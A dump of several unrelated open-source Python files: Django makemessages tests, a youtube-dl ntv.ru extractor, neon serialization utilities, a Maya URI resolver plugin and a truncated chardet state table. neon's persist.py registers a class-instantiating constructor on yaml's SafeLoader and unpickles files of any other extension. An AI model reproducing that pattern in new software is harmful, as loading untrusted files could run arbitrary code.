six.assertRegex(self, po_contents, r'#\..+Translators: valid i18n comment #9')
self.assertMsgId("Translatable literal #9j", po_contents)
def test_makemessages_find_files(self):
"""
Test that find_files only discover files having the proper extensions.
"""
cmd = MakeMessagesCommand()
cmd.ignore_patterns = ['CVS', '.*', '*~', '*.pyc']
cmd.symlinks = False
cmd.domain = 'django'
cmd.extensions = ['html', 'txt', 'py']
cmd.verbosity = 0
cmd.locale_paths = []
cmd.default_locale_path = os.path.join(self.test_dir, 'locale')
found_files = cmd.find_files(self.test_dir)
found_exts = set([os.path.splitext(tfile.file)[1] for tfile in found_files])
self.assertEqual(found_exts.difference({'.py', '.html', '.txt'}), set())
cmd.extensions = ['js']
cmd.domain = 'djangojs'
found_files = cmd.find_files(self.test_dir)
found_exts = set([os.path.splitext(tfile.file)[1] for tfile in found_files])
self.assertEqual(found_exts.difference({'.js'}), set())
@mock.patch('django.core.management.commands.makemessages.popen_wrapper')
def test_makemessages_gettext_version(self, mocked_popen_wrapper):
# "Normal" output:
mocked_popen_wrapper.return_value = (
"xgettext (GNU gettext-tools) 0.18.1\n"
"Copyright (C) 1995-1998, 2000-2010 Free Software Foundation, Inc.\n"
"License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>\n"
"This is free software: you are free to change and redistribute it.\n"
"There is NO WARRANTY, to the extent permitted by law.\n"
"Written by Ulrich Drepper.\n", '', 0)
cmd = MakeMessagesCommand()
self.assertEqual(cmd.gettext_version, (0, 18, 1))
# Version number with only 2 parts (#23788)
mocked_popen_wrapper.return_value = (
"xgettext (GNU gettext-tools) 0.17\n", '', 0)
cmd = MakeMessagesCommand()
self.assertEqual(cmd.gettext_version, (0, 17))
# Bad version output
mocked_popen_wrapper.return_value = (
"any other return value\n", '', 0)
cmd = MakeMessagesCommand()
with six.assertRaisesRegex(self, CommandError, "Unable to get gettext version. Is it installed?"):
cmd.gettext_version
def test_po_file_encoding_when_updating(self):
"""Update of PO file doesn't corrupt it with non-UTF-8 encoding on Python3+Windows (#23271)"""
BR_PO_BASE = 'locale/pt_BR/LC_MESSAGES/django'
os.chdir(self.test_dir)
shutil.copyfile(BR_PO_BASE + '.pristine', BR_PO_BASE + '.po')
self.addCleanup(self.rmfile, os.path.join(self.test_dir, 'locale', 'pt_BR', 'LC_MESSAGES', 'django.po'))
management.call_command('makemessages', locale=['pt_BR'], verbosity=0)
self.assertTrue(os.path.exists(BR_PO_BASE + '.po'))
with io.open(BR_PO_BASE + '.po', 'r', encoding='utf-8') as fp:
po_contents = force_text(fp.read())
self.assertMsgStr("Größe", po_contents)
class JavascriptExtractorTests(ExtractorTests):
PO_FILE = 'locale/%s/LC_MESSAGES/djangojs.po' % LOCALE
def test_javascript_literals(self):
os.chdir(self.test_dir)
_, po_contents = self._run_makemessages(domain='djangojs')
self.assertMsgId('This literal should be included.', po_contents)
self.assertMsgId('gettext_noop should, too.', po_contents)
self.assertMsgId('This one as well.', po_contents)
self.assertMsgId(r'He said, \"hello\".', po_contents)
self.assertMsgId("okkkk", po_contents)
self.assertMsgId("TEXT", po_contents)
self.assertMsgId("It's at http://example.com", po_contents)
self.assertMsgId("String", po_contents)
self.assertMsgId("/* but this one will be too */ 'cause there is no way of telling...", po_contents)
self.assertMsgId("foo", po_contents)
self.assertMsgId("bar", po_contents)
self.assertMsgId("baz", po_contents)
self.assertMsgId("quz", po_contents)
self.assertMsgId("foobar", po_contents)
@override_settings(
STATIC_ROOT=os.path.join(this_directory, 'commands', 'static/'),
MEDIA_ROOT=os.path.join(this_directory, 'commands', 'media_root/'))
def test_media_static_dirs_ignored(self):
"""
Regression test for #23583.
"""
_, po_contents = self._run_makemessages(domain='djangojs')
self.assertMsgId("Static content inside app should be included.", po_contents)
self.assertNotMsgId("Content from STATIC_ROOT should not be included", po_contents)
@override_settings(STATIC_ROOT=None, MEDIA_ROOT='')
def test_default_root_settings(self):
"""
Regression test for #23717.
"""
_, po_contents = self._run_makemessages(domain='djangojs')
self.assertMsgId("Static content inside app should be included.", po_contents)
class IgnoredExtractorTests(ExtractorTests):
def test_ignore_directory(self):
out, po_contents = self._run_makemessages(ignore_patterns=[
os.path.join('ignore_dir', '*'),
])
self.assertIn("ignoring directory ignore_dir", out)
self.assertMsgId('This literal should be included.', po_contents)
self.assertNotMsgId('This should be ignored.', po_contents)
def test_ignore_subdirectory(self):
out, po_contents = self._run_makemessages(ignore_patterns=[
'templates/*/ignore.html',
'templates/subdir/*',
])
self.assertIn("ignoring directory subdir", out)
self.assertNotMsgId('This subdir should be ignored too.', po_contents)
def test_ignore_file_patterns(self):
out, po_contents = self._run_makemessages(ignore_patterns=[
'xxx_*',
])
self.assertIn("ignoring file xxx_ignored.html", out)
self.assertNotMsgId('This should be ignored too.', po_contents)
@override_settings(
STATIC_ROOT=os.path.join(this_directory, 'commands', 'static/'),
MEDIA_ROOT=os.path.join(this_directory, 'commands', 'media_root/'))
def test_media_static_dirs_ignored(self):
out, _ = self._run_makemessages()
self.assertIn("ignoring directory static", out)
self.assertIn("ignoring directory media_root", out)
class SymlinkExtractorTests(ExtractorTests):
def setUp(self):
super(SymlinkExtractorTests, self).setUp()
self.symlinked_dir = os.path.join(self.test_dir, 'templates_symlinked')
def tearDown(self):
super(SymlinkExtractorTests, self).tearDown()
os.chdir(self.test_dir)
try:
os.remove(self.symlinked_dir)
except OSError:
pass
os.chdir(self._cwd)
def test_symlink(self):
# On Python < 3.2 os.symlink() exists only on Unix
if hasattr(os, 'symlink'):
if os.path.exists(self.symlinked_dir):
self.assertTrue(os.path.islink(self.symlinked_dir))
else:
# On Python >= 3.2) os.symlink() exists always but then can
# fail at runtime when user hasn't the needed permissions on
# Windows versions that support symbolink links (>= 6/Vista).
# See Python issue 9333 (http://bugs.python.org/issue9333).
# Skip the test in that case
try:
os.symlink(os.path.join(self.test_dir, 'templates'), self.symlinked_dir)
except (OSError, NotImplementedError):
raise SkipTest("os.symlink() is available on this OS but can't be used by this user.")
os.chdir(self.test_dir)
management.call_command('makemessages', locale=[LOCALE], verbosity=0, symlinks=True)
self.assertTrue(os.path.exists(self.PO_FILE))
with open(self.PO_FILE, 'r') as fp:
po_contents = force_text(fp.read())
self.assertMsgId('This literal should be included.', po_contents)
self.assertIn('templates_symlinked/test.html', po_contents)
class CopyPluralFormsExtractorTests(ExtractorTests):
PO_FILE_ES = 'locale/es/LC_MESSAGES/django.po'
def tearDown(self):
super(CopyPluralFormsExtractorTests, self).tearDown()
os.chdir(self.test_dir)
try:
self._rmrf('locale/es')
except OSError:
pass
os.chdir(self._cwd)
def test_copy_plural_forms(self):
os.chdir(self.test_dir)
management.call_command('makemessages', locale=[LOCALE], verbosity=0)
self.assertTrue(os.path.exists(self.PO_FILE))
with open(self.PO_FILE, 'r') as fp:
po_contents = force_text(fp.read())
self.assertIn('Plural-Forms: nplurals=2; plural=(n != 1)', po_contents)
def test_override_plural_forms(self):
"""Ticket #20311."""
os.chdir(self.test_dir)
management.call_command('makemessages', locale=['es'], extensions=['djtpl'], verbosity=0)
self.assertTrue(os.path.exists(self.PO_FILE_ES))
with io.open(self.PO_FILE_ES, 'r', encoding='utf-8') as fp:
po_contents = fp.read()
found = re.findall(r'^(?P<value>"Plural-Forms.+?\\n")\s*$', po_contents, re.MULTILINE | re.DOTALL)
self.assertEqual(1, len(found))
class NoWrapExtractorTests(ExtractorTests):
def test_no_wrap_enabled(self):
os.chdir(self.test_dir)
management.call_command('makemessages', locale=[LOCALE], verbosity=0, no_wrap=True)
self.assertTrue(os.path.exists(self.PO_FILE))
with open(self.PO_FILE, 'r') as fp:
po_contents = force_text(fp.read())
self.assertMsgId('This literal should also be included wrapped or not wrapped depending on the use of the --no-wrap option.', po_contents)
def test_no_wrap_disabled(self):
os.chdir(self.test_dir)
management.call_command('makemessages', locale=[LOCALE], verbosity=0, no_wrap=False)
self.assertTrue(os.path.exists(self.PO_FILE))
with open(self.PO_FILE, 'r') as fp:
po_contents = force_text(fp.read())
self.assertMsgId('""\n"This literal should also be included wrapped or not wrapped depending on the "\n"use of the --no-wrap option."', po_contents, use_quotes=False)
class LocationCommentsTests(ExtractorTests):
def test_no_location_enabled(self):
"""Behavior is correct if --no-location switch is specified. See #16903."""
os.chdir(self.test_dir)
management.call_command('makemessages', locale=[LOCALE], verbosity=0, no_location=True)
self.assertTrue(os.path.exists(self.PO_FILE))
self.assertLocationCommentNotPresent(self.PO_FILE, 55, 'templates', 'test.html.py')
def test_no_location_disabled(self):
"""Behavior is correct if --no-location switch isn't specified."""
os.chdir(self.test_dir)
management.call_command('makemessages', locale=[LOCALE], verbosity=0, no_location=False)
self.assertTrue(os.path.exists(self.PO_FILE))
# #16903 -- Standard comment with source file relative path should be present
self.assertLocationCommentPresent(self.PO_FILE, 55, 'templates', 'test.html')
# #21208 -- Leaky paths in comments on Windows e.g. #: path\to\file.html.py:123
self.assertLocationCommentNotPresent(self.PO_FILE, None, 'templates', 'test.html.py')
class KeepPotFileExtractorTests(ExtractorTests):
POT_FILE = 'locale/django.pot'
def setUp(self):
super(KeepPotFileExtractorTests, self).setUp()
def tearDown(self):
super(KeepPotFileExtractorTests, self).tearDown()
os.chdir(self.test_dir)
try:
os.unlink(self.POT_FILE)
except OSError:
pass
os.chdir(self._cwd)
def test_keep_pot_disabled_by_default(self):
os.chdir(self.test_dir)
management.call_command('makemessages', locale=[LOCALE], verbosity=0)
self.assertFalse(os.path.exists(self.POT_FILE))
def test_keep_pot_explicitly_disabled(self):
os.chdir(self.test_dir)
management.call_command('makemessages', locale=[LOCALE], verbosity=0,
keep_pot=False)
self.assertFalse(os.path.exists(self.POT_FILE))
def test_keep_pot_enabled(self):
os.chdir(self.test_dir)
management.call_command('makemessages', locale=[LOCALE], verbosity=0,
keep_pot=True)
self.assertTrue(os.path.exists(self.POT_FILE))
class MultipleLocaleExtractionTests(ExtractorTests):
PO_FILE_PT = 'locale/pt/LC_MESSAGES/django.po'
PO_FILE_DE = 'locale/de/LC_MESSAGES/django.po'
LOCALES = ['pt', 'de', 'ch']
def tearDown(self):
os.chdir(self.test_dir)
for locale in self.LOCALES:
try:
self._rmrf('locale/%s' % locale)
except OSError:
pass
os.chdir(self._cwd)
def test_multiple_locales(self):
os.chdir(self.test_dir)
management.call_command('makemessages', locale=['pt', 'de'], verbosity=0)
self.assertTrue(os.path.exists(self.PO_FILE_PT))
self.assertTrue(os.path.exists(self.PO_FILE_DE))
class ExcludedLocaleExtractionTests(ExtractorTests):
LOCALES = ['en', 'fr', 'it']
PO_FILE = 'locale/%s/LC_MESSAGES/django.po'
test_dir = os.path.abspath(os.path.join(this_directory, 'exclude'))
def _set_times_for_all_po_files(self):
"""
Set access and modification times to the Unix epoch time for all the .po files.
"""
for locale in self.LOCALES:
os.utime(self.PO_FILE % locale, (0, 0))
def setUp(self):
super(ExcludedLocaleExtractionTests, self).setUp()
os.chdir(self.test_dir) # ExtractorTests.tearDown() takes care of restoring.
shutil.copytree('canned_locale', 'locale')
self._set_times_for_all_po_files()
self.addCleanup(self._rmrf, os.path.join(self.test_dir, 'locale'))
def test_command_help(self):
with captured_stdout(), captured_stderr():
# `call_command` bypasses the parser; by calling
# `execute_from_command_line` with the help subcommand we
# ensure that there are no issues with the parser itself.
execute_from_command_line(['django-admin', 'help', 'makemessages'])
def test_one_locale_excluded(self):
management.call_command('makemessages', exclude=['it'], stdout=StringIO())
self.assertRecentlyModified(self.PO_FILE % 'en')
self.assertRecentlyModified(self.PO_FILE % 'fr')
self.assertNotRecentlyModified(self.PO_FILE % 'it')
def test_multiple_locales_excluded(self):
management.call_command('makemessages', exclude=['it', 'fr'], stdout=StringIO())
self.assertRecentlyModified(self.PO_FILE % 'en')
self.assertNotRecentlyModified(self.PO_FILE % 'fr')
self.assertNotRecentlyModified(self.PO_FILE % 'it')
def test_one_locale_excluded_with_locale(self):
management.call_command('makemessages', locale=['en', 'fr'], exclude=['fr'], stdout=StringIO())
self.assertRecentlyModified(self.PO_FILE % 'en')
self.assertNotRecentlyModified(self.PO_FILE % 'fr')
self.assertNotRecentlyModified(self.PO_FILE % 'it')
def test_multiple_locales_excluded_with_locale(self):
management.call_command('makemessages', locale=['en', 'fr', 'it'], exclude=['fr', 'it'],
stdout=StringIO())
self.assertRecentlyModified(self.PO_FILE % 'en')
self.assertNotRecentlyModified(self.PO_FILE % 'fr')
self.assertNotRecentlyModified(self.PO_FILE % 'it')
class CustomLayoutExtractionTests(ExtractorTests):
def setUp(self):
self._cwd = os.getcwd()
self.test_dir = os.path.join(this_directory, 'project_dir')
def test_no_locale_raises(self):
os.chdir(self.test_dir)
with six.assertRaisesRegex(self, management.CommandError,
"Unable to find a locale path to store translations for file"):
management.call_command('makemessages', locale=LOCALE, verbosity=0)
@override_settings(
LOCALE_PATHS=[os.path.join(this_directory, 'project_dir', 'project_locale')],
)
def test_project_locale_paths(self):
"""
Test that:
* translations for an app containing a locale folder are stored in that folder
* translations outside of that app are in LOCALE_PATHS[0]
"""
os.chdir(self.test_dir)
self.addCleanup(shutil.rmtree,
os.path.join(settings.LOCALE_PATHS[0], LOCALE), True)
self.addCleanup(shutil.rmtree,
os.path.join(self.test_dir, 'app_with_locale', 'locale', LOCALE), True)
management.call_command('makemessages', locale=[LOCALE], verbosity=0)
project_de_locale = os.path.join(
self.test_dir, 'project_locale', 'de', 'LC_MESSAGES', 'django.po')
app_de_locale = os.path.join(
self.test_dir, 'app_with_locale', 'locale', 'de', 'LC_MESSAGES', 'django.po')
self.assertTrue(os.path.exists(project_de_locale))
self.assertTrue(os.path.exists(app_de_locale))
with open(project_de_locale, 'r') as fp:
po_contents = force_text(fp.read())
self.assertMsgId('This app has no locale directory', po_contents)
self.assertMsgId('This is a project-level string', po_contents)
with open(app_de_locale, 'r') as fp:
po_contents = force_text(fp.read())
self.assertMsgId('This app has a locale directory', po_contents)
| bsd-3-clause |
jonyroda97/redbot-amigosprovaveis | lib/youtube_dl/extractor/ntvru.py | 52 | 5121 | # coding: utf-8
from __future__ import unicode_literals
from .common import InfoExtractor
from ..utils import (
clean_html,
xpath_text,
int_or_none,
)
class NTVRuIE(InfoExtractor):
IE_NAME = 'ntv.ru'
_VALID_URL = r'https?://(?:www\.)?ntv\.ru/(?:[^/]+/)*(?P<id>[^/?#&]+)'
_TESTS = [{
'url': 'http://www.ntv.ru/novosti/863142/',
'md5': 'ba7ea172a91cb83eb734cad18c10e723',
'info_dict': {
'id': '746000',
'ext': 'mp4',
'title': 'Командующий Черноморским флотом провел переговоры в штабе ВМС Украины',
'description': 'Командующий Черноморским флотом провел переговоры в штабе ВМС Украины',
'thumbnail': r're:^http://.*\.jpg',
'duration': 136,
},
}, {
'url': 'http://www.ntv.ru/video/novosti/750370/',
'md5': 'adecff79691b4d71e25220a191477124',
'info_dict': {
'id': '750370',
'ext': 'mp4',
'title': 'Родные пассажиров пропавшего Boeing не верят в трагический исход',
'description': 'Родные пассажиров пропавшего Boeing не верят в трагический исход',
'thumbnail': r're:^http://.*\.jpg',
'duration': 172,
},
}, {
'url': 'http://www.ntv.ru/peredacha/segodnya/m23700/o232416',
'md5': '82dbd49b38e3af1d00df16acbeab260c',
'info_dict': {
'id': '747480',
'ext': 'mp4',
'title': '«Сегодня». 21 марта 2014 года. 16:00',
'description': '«Сегодня». 21 марта 2014 года. 16:00',
'thumbnail': r're:^http://.*\.jpg',
'duration': 1496,
},
}, {
'url': 'http://www.ntv.ru/kino/Koma_film',
'md5': 'f825770930937aa7e5aca0dc0d29319a',
'info_dict': {
'id': '1007609',
'ext': 'mp4',
'title': 'Остросюжетный фильм «Кома»',
'description': 'Остросюжетный фильм «Кома»',
'thumbnail': r're:^http://.*\.jpg',
'duration': 5592,
},
}, {
'url': 'http://www.ntv.ru/serial/Delo_vrachey/m31760/o233916/',
'md5': '9320cd0e23f3ea59c330dc744e06ff3b',
'info_dict': {
'id': '751482',
'ext': 'mp4',
'title': '«Дело врачей»: «Деревце жизни»',
'description': '«Дело врачей»: «Деревце жизни»',
'thumbnail': r're:^http://.*\.jpg',
'duration': 2590,
},
}]
_VIDEO_ID_REGEXES = [
r'<meta property="og:url" content="http://www\.ntv\.ru/video/(\d+)',
r'<video embed=[^>]+><id>(\d+)</id>',
r'<video restriction[^>]+><key>(\d+)</key>',
]
def _real_extract(self, url):
video_id = self._match_id(url)
webpage = self._download_webpage(url, video_id)
video_url = self._og_search_property(
('video', 'video:iframe'), webpage, default=None)
if video_url:
video_id = self._search_regex(
r'https?://(?:www\.)?ntv\.ru/video/(?:embed/)?(\d+)',
video_url, 'video id', default=None)
if not video_id:
video_id = self._html_search_regex(
self._VIDEO_ID_REGEXES, webpage, 'video id')
player = self._download_xml(
'http://www.ntv.ru/vi%s/' % video_id,
video_id, 'Downloading video XML')
title = clean_html(xpath_text(player, './data/title', 'title', fatal=True))
description = clean_html(xpath_text(player, './data/description', 'description'))
video = player.find('./data/video')
video_id = xpath_text(video, './id', 'video id')
thumbnail = xpath_text(video, './splash', 'thumbnail')
duration = int_or_none(xpath_text(video, './totaltime', 'duration'))
view_count = int_or_none(xpath_text(video, './views', 'view count'))
token = self._download_webpage(
'http://stat.ntv.ru/services/access/token',
video_id, 'Downloading access token')
formats = []
for format_id in ['', 'hi', 'webm']:
file_ = video.find('./%sfile' % format_id)
if file_ is None:
continue
size = video.find('./%ssize' % format_id)
formats.append({
'url': 'http://media2.ntv.ru/vod/%s&tok=%s' % (file_.text, token),
'filesize': int_or_none(size.text if size is not None else None),
})
self._sort_formats(formats)
return {
'id': video_id,
'title': title,
'description': description,
'thumbnail': thumbnail,
'duration': duration,
'view_count': view_count,
'formats': formats,
}
| gpl-3.0 |
lihuanghai/neon | neon/util/persist.py | 9 | 8005 | # ----------------------------------------------------------------------------
# Copyright 2014 Nervana Systems Inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ----------------------------------------------------------------------------
"""
Utility functions for saving various types of objects state.
"""
import logging
import os
import yaml
from neon.util.compat import pickle
logger = logging.getLogger(__name__)
def ensure_dirs_exist(path):
"""
Simple helper that ensures that any directories specified in the path are
created prior to use.
Arguments:
path (str): the path (may be to a file or directory). Any intermediate
directories will be created.
Returns:
str: The unmodified path value.
"""
outdir = os.path.dirname(path)
if outdir != '' and not os.path.isdir(outdir):
os.makedirs(outdir)
return path
def convert_scalar_node(val):
"""
Helper to extract and return the appropriately types value of a ScalarNode
object.
Arguments:
val: (yaml.nodes.ScalarNode): object to extract value from
Returns:
float, int, string: the actual value
"""
if not isinstance(val, yaml.nodes.ScalarNode):
return val
if val.tag.endswith("int"):
return int(val.value)
elif val.tag.endswith("float"):
return float(val.value)
else:
# assume a string
return val.value
def extract_child_node_vals(node, keys):
"""
Helper to iterate through the immediate children of the yaml node object
passed, looking for the key values specified.
Arguments:
node (yaml.nodes.Node): the parent node upon which to begin the search
keys (list): set of strings indicating the child keys we want to
extract corresponding values for.
Returns:
dict: with one item for each key. value is value found in search for
that key, or None if not found.
"""
res = dict()
for child in node.value:
# child node values are two element tuples, where the first is a scalar
# node, and the second can be other types of nodes.
tag = child[0].value
if isinstance(child[1], yaml.nodes.ScalarNode):
val = convert_scalar_node(child[1])
elif isinstance(child[1], yaml.nodes.SequenceNode):
val = [convert_scalar_node(x) for x in child[1].value]
elif isinstance(child[1], yaml.nodes.MappingNode):
val = dict()
for item in child[1].value:
val[item[0].value] = convert_scalar_node(item[1])
else:
logger.warning("unknown node type: %s, ignoring tag %s",
str(type(child[1])), tag)
val = None
for key in keys:
if tag == key:
res[key] = val
for key in keys:
if key not in res:
res[key] = None
return res
def obj_multi_constructor(loader, tag_suffix, node):
"""
Utility function used to actually import and generate a new class instance
from its name and parameters
Arguments:
loader (yaml.loader.SafeLoader): carries out actual loading
tag_suffix (str): The latter portion of the tag, representing the full
module and class name of the object being
instantiated.
node (yaml.MappingNode): tag/value set specifying the parameters
required for constructing new objects of this
type
"""
# extract class name and import neccessary module.
parts = tag_suffix.split('.')
module = '.'.join(parts[:-1])
try:
cls = __import__(module)
except ImportError as err:
# we allow a shortcut syntax that skips neon. from import path, try
# again with this prepended
if parts[0] != "neon":
parts.insert(0, "neon")
module = '.'.join(parts[:-1])
cls = __import__(module)
if 'datasets' in parts:
# clear any previous datasets loaded with a different backend
cls.datasets.dataset.Dataset.inputs = {
'train': None, 'test': None, 'validation': None}
cls.datasets.dataset.Dataset.targets = {
'train': None, 'test': None, 'validation': None}
else:
raise err
for comp in parts[1:]:
cls = getattr(cls, comp)
# need to create a new object
try:
res = cls(**loader.construct_mapping(node, deep=True))
except TypeError as e:
logger.warning("Unable to construct '%s' instance. Error: %s",
cls.__name__, e.message)
res = None
return res
def initialize_yaml():
yaml.add_multi_constructor('!obj:', obj_multi_constructor,
yaml.loader.SafeLoader)
def deserialize(load_path, verbose=True):
"""
Converts a serialized object into a python data structure. We currently
support reading from the following file formats (expected filename
extension in brackets):
* python pickle (.pkl)
* YAML (.yaml)
Arguments:
load_path (str, File): path and name of the serialized on-disk file to
load (or an already loaded file object).
The type to write is inferred based on filename
extension. If no extension given, pickle format
is attempted.
Returns:
object: Converted in-memory python data structure.
See Also:
serialize
"""
if isinstance(load_path, str):
load_path = open(os.path.expandvars(os.path.expanduser(load_path)))
fname = load_path.name
if verbose:
logger.warn("deserializing object from: %s", fname)
if (fname.lower().endswith('.yaml') or fname.lower().endswith('.yml')):
initialize_yaml()
return yaml.safe_load(load_path)
else:
try:
return pickle.load(load_path)
except AttributeError:
msg = ("Problems deserializing: %s. Its possible the interface "
"for this object has changed since being serialized. You "
"may need to remove and recreate it." % load_path)
logger.error(msg)
raise AttributeError(msg)
def serialize(obj, save_path, verbose=True):
"""
Dumps a python data structure to a saved on-disk representation. We
currently support writing to the following file formats (expected filename
extension in brackets):
* python pickle (.pkl)
Arguments:
obj (object): the python object to be saved.
save_path (str): Where to write the serialized object (full path and
file name)
See Also:
deserialize
"""
if save_path is None or len(save_path) == 0:
return
save_path = os.path.expandvars(os.path.expanduser(save_path))
if verbose:
logger.warn("serializing object to: %s", save_path)
ensure_dirs_exist(save_path)
pickle.dump(obj, open(save_path, 'wb'), -1)
class YAMLable(yaml.YAMLObject):
"""
Base class for any objects we'd like to be able to safely parse from yaml
configuration strems (or dump suitable representation back out to such a
stream).
"""
yaml_loader = yaml.SafeLoader
| apache-2.0 |
astips/tk-astips-app-url-resolver | studio/maya/plugins/murlResolver.py | 1 | 1936 | # -*- coding: utf-8 -*-
###########################################################################################
#
# Author: astips - (animator.well)
#
# Date: 2017.03
#
# Url: https://github.com/astips
#
# Description: demo of maya url resolver plugin
#
###########################################################################################
import sys
from maya import OpenMaya, OpenMayaMPx
from murl import MURL
_CACHE = {}
class MUrlResolver(OpenMayaMPx.MPxFileResolver):
fileResolverName = "astipsFileResolver"
uriSchemeName = "astips"
def decode(self, uriValue):
url_string = uriValue.asString()
if url_string not in _CACHE:
murl = MURL(uriValue)
_CACHE[url_string] = murl.real_path
return _CACHE[url_string]
def resolveURI(self, uriValue, mode, ReturnStatus=None):
return self.decode(uriValue)
def resolveURIWithContext(self, uriValue, mode, contextNodeFullName, ReturnStatus=None):
return self.decode(uriValue)
@classmethod
def className(cls):
return cls.__name__
def resolverName(self):
return self.fileResolverName
def uriScheme(self):
return self.uriSchemeName
@classmethod
def resolverCreator(cls):
return cls()
def initializePlugin(mobject):
mplugin = OpenMayaMPx.MFnPlugin(mobject, "astips", "1.0")
try:
mplugin.registerURIFileResolver(MUrlResolver.fileResolverName,
MUrlResolver.uriSchemeName,
MUrlResolver.resolverCreator
)
except:
sys.stderr.write("Error loading")
raise
def uninitializePlugin(mobject):
mplugin = OpenMayaMPx.MFnPlugin(mobject)
try:
mplugin.deregisterURIFileResolver(MUrlResolver.fileResolverName)
except:
sys.stderr.write("Error removing")
raise
| mit |
Fafou/Sick-Beard | sickbeard/clients/requests/packages/charade/escsm.py | 206 | 8081 | ######################## BEGIN LICENSE BLOCK ########################
# The Original Code is mozilla.org code.
#
# The Initial Developer of the Original Code is
# Netscape Communications Corporation.
# Portions created by the Initial Developer are Copyright (C) 1998
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
# Mark Pilgrim - port to Python
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
from .constants import eStart, eError, eItsMe
HZ_cls = (
1,0,0,0,0,0,0,0, # 00 - 07
0,0,0,0,0,0,0,0, # 08 - 0f
0,0,0,0,0,0,0,0, # 10 - 17
0,0,0,1,0,0,0,0, # 18 - 1f
0,0,0,0,0,0,0,0, # 20 - 27
0,0,0,0,0,0,0,0, # 28 - 2f
0,0,0,0,0,0,0,0, # 30 - 37
0,0,0,0,0,0,0,0, # 38 - 3f
0,0,0,0,0,0,0,0, # 40 - 47
0,0,0,0,0,0,0,0, # 48 - 4f
0,0,0,0,0,0,0,0, # 50 - 57
0,0,0,0,0,0,0,0, # 58 - 5f
0,0,0,0,0,0,0,0, # 60 - 67
0,0,0,0,0,0,0,0, # 68 - 6f
0,0,0,0,0,0,0,0, # 70 - 77
0,0,0,4,0,5,2,0, # 78 - 7f
1,1,1,1,1,1,1,1, # 80 - 87
1,1,1,1,1,1,1,1, # 88 - 8f
1,1,1,1,1,1,1,1, # 90 - 97
1,1,1,1,1,1,1,1, # 98 - 9f
1,1,1,1,1,1,1,1, # a0 - a7
1,1,1,1,1,1,1,1, # a8 - af
1,1,1,1,1,1,1,1, # b0 - b7
1,1,1,1,1,1,1,1, # b8 - bf
1,1,1,1,1,1,1,1, # c0 - c7
1,1,1,1,1,1,1,1, # c8 - cf
1,1,1,1,1,1,1,1, # d0 - d7
1,1,1,1,1,1,1,1, # d8 - df
1,1,1,1,1,1,1,1, # e0 - e7
1,1,1,1,1,1,1,1, # e8 - ef
1,1,1,1,1,1,1,1, # f0 - f7
1,1,1,1,1,1,1,1, # f8 - ff
)
HZ_st = (
eStart,eError, 3,eStart,eStart,eStart,eError,eError,# 00-07
eError,eError,eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,# 08-0f
eItsMe,eItsMe,eError,eError,eStart,eStart, 4,eError,# 10-17
5,eError, 6,eError, 5, 5, 4,eError,# 18-1f
4,eError, 4, 4, 4,eError, 4,eError,# 20-27
4,eItsMe,eStart,eStart,eStart,eStart,eStart,eStart,# 28-2f
)
HZCharLenTable = (0, 0, 0, 0, 0, 0)
HZSMModel = {'classTable': HZ_cls,
'classFactor': 6,
'stateTable': HZ_st,
'charLenTable': HZCharLenTable,
'name': "HZ-GB-2312"}
ISO2022CN_cls = (
2,0,0,0,0,0,0,0, # 00 - 07
0,0,0,0,0,0,0,0, # 08 - 0f
0,0,0,0,0,0,0,0, # 10 - 17
0,0,0,1,0,0,0,0, # 18 - 1f
0,0,0,0,0,0,0,0, # 20 - 27
0,3,0,0,0,0,0,0, # 28 - 2f
0,0,0,0,0,0,0,0, # 30 - 37
0,0,0,0,0,0,0,0, # 38 - 3f
0,0,0,4,0,0,0,0, # 40 - 47
0,0,0,0,0,0,0,0, # 48 - 4f
0,0,0,0,0,0,0,0, # 50 - 57
0,0,0,0,0,0,0,0, # 58 - 5f
0,0,0,0,0,0,0,0, # 60 - 67
0,0,0,0,0,0,0,0, # 68 - 6f
0,0,0,0,0,0,0,0, # 70 - 77
0,0,0,0,0,0,0,0, # 78 - 7f
2,2,2,2,2,2,2,2, # 80 - 87
2,2,2,2,2,2,2,2, # 88 - 8f
2,2,2,2,2,2,2,2, # 90 - 97
2,2,2,2,2,2,2,2, # 98 - 9f
2,2,2,2,2,2,2,2, # a0 - a7
2,2,2,2,2,2,2,2, # a8 - af
2,2,2,2,2,2,2,2, # b0 - b7
2,2,2,2,2,2,2,2, # b8 - bf
2,2,2,2,2,2,2,2, # c0 - c7
2,2,2,2,2,2,2,2, # c8 - cf
2,2,2,2,2,2,2,2, # d0 - d7
2,2,2,2,2,2,2,2, # d8 - df
2,2,2,2,2,2,2,2, # e0 - e7
2,2,2,2,2,2,2,2, # e8 - ef
2,2,2,2,2,2,2,2, # f0 - f7
2,2,2,2,2,2,2,2, # f8 - ff
)
ISO2022CN_st = (
eStart, 3,eError,eStart,eStart,eStart,eStart,eStart,# 00-07
eStart,eError,eError,eError,eError,eError,eError,eError,# 08-0f
eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,# 10-17
eItsMe,eItsMe,eItsMe,eError,eError,eError, 4,eError,# 18-1f
eError,eError,eError,eItsMe,eError,eError,eError,eError,# 20-27
5, 6,eError,eError,eError,eError,eError,eError,# 28-2f
eError,eError,eError,eItsMe,eError,eError,eError,eError,# 30-37
eError,eError,eError,eError,eError,eItsMe,eError,eStart,# 38-3f
)
ISO2022CNCharLenTable = (0, 0, 0, 0, 0, 0, 0, 0, 0)
ISO2022CNSMModel = {'classTable': ISO2022CN_cls,
'classFactor': 9,
'stateTable': ISO2022CN_st,
'charLenTable': ISO2022CNCharLenTable,
